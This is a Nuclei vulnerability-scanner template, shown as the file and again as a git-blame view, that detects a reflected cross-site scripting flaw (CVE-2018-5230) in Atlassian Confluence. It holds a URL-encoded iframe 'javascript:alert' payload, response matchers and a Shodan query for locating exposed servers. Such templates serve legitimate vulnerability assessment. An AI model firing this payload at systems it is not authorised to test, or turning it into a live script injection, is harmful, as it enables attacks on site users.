nuclei-templates/cves/2018/CVE-2018-5230.yaml

id: CVE-2018-5230

info:
  name: Atlassian Confluence Status-List XSS
  author: madrobot
  severity: medium
  description: |
    The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom fields when an invalid value is specified.
  reference:
    - https://jira.atlassian.com/browse/JRASERVER-67289
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-5230
    cwe-id: CWE-79
  metadata:
    shodan-query: http.component:"Atlassian Confluence"
  tags: cve,cve2018,atlassian,confluence,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '<iframe src="javascript:alert(document.domain)">'
          - 'confluence'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'
misc changes 2021-01-02 05:00:39 +00:00			`id: CVE-2018-5230`
Create Atlassian Confluence Status-List XSS.yaml 2020-04-08 11:25:25 +00:00
			`info:`
			`name: Atlassian Confluence Status-List XSS`
			`author: madrobot`
Update syntax 2020-05-25 07:49:06 +00:00			`severity: medium`
Update CVE-2018-5230.yaml (#3928) * Update CVE-2018-5230.yaml Solves a false positive when the requests triggers a file download nuclei -debug -t nuclei-templates/cves/2018/CVE-2018-5230.yaml -u https://get-jama.replicated.com * matcher fixes Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-18 07:25:28 +00:00			`description: \|`
			`The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom fields when an invalid value is specified.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://jira.atlassian.com/browse/JRASERVER-67289`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 6.1`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2018-5230`
			`cwe-id: CWE-79`
added confluence metadata and minor matcher updates (#3929) 2022-03-19 10:42:08 +00:00			`metadata:`
			`shodan-query: http.component:"Atlassian Confluence"`
Update CVE-2018-5230.yaml (#3928) * Update CVE-2018-5230.yaml Solves a false positive when the requests triggers a file download nuclei -debug -t nuclei-templates/cves/2018/CVE-2018-5230.yaml -u https://get-jama.replicated.com * matcher fixes Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-18 07:25:28 +00:00			`tags: cve,cve2018,atlassian,confluence,xss`
Create Atlassian Confluence Status-List XSS.yaml 2020-04-08 11:25:25 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update CVE-2018-5230.yaml (#3928) * Update CVE-2018-5230.yaml Solves a false positive when the requests triggers a file download nuclei -debug -t nuclei-templates/cves/2018/CVE-2018-5230.yaml -u https://get-jama.replicated.com * matcher fixes Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-18 07:25:28 +00:00			`- "{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"`

Fixed default condition OR to AND in false-positives 2020-07-08 11:38:57 +00:00			`matchers-condition: and`
Create Atlassian Confluence Status-List XSS.yaml 2020-04-08 11:25:25 +00:00			`matchers:`
			`- type: status`
			`status:`
Update syntax 2020-05-25 07:49:06 +00:00			`- 200`
Update CVE-2018-5230.yaml (#3928) * Update CVE-2018-5230.yaml Solves a false positive when the requests triggers a file download nuclei -debug -t nuclei-templates/cves/2018/CVE-2018-5230.yaml -u https://get-jama.replicated.com * matcher fixes Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-18 07:25:28 +00:00
Update Atlassian Confluence Status-List XSS.yaml 2020-04-08 13:16:19 +00:00			`- type: word`
Create Atlassian Confluence Status-List XSS.yaml 2020-04-08 11:25:25 +00:00			`part: body`
Update CVE-2018-5230.yaml (#3928) * Update CVE-2018-5230.yaml Solves a false positive when the requests triggers a file download nuclei -debug -t nuclei-templates/cves/2018/CVE-2018-5230.yaml -u https://get-jama.replicated.com * matcher fixes Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-03-18 07:25:28 +00:00			`words:`
			`- '<iframe src="javascript:alert(document.domain)">'`
			`- 'confluence'`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- 'text/html'`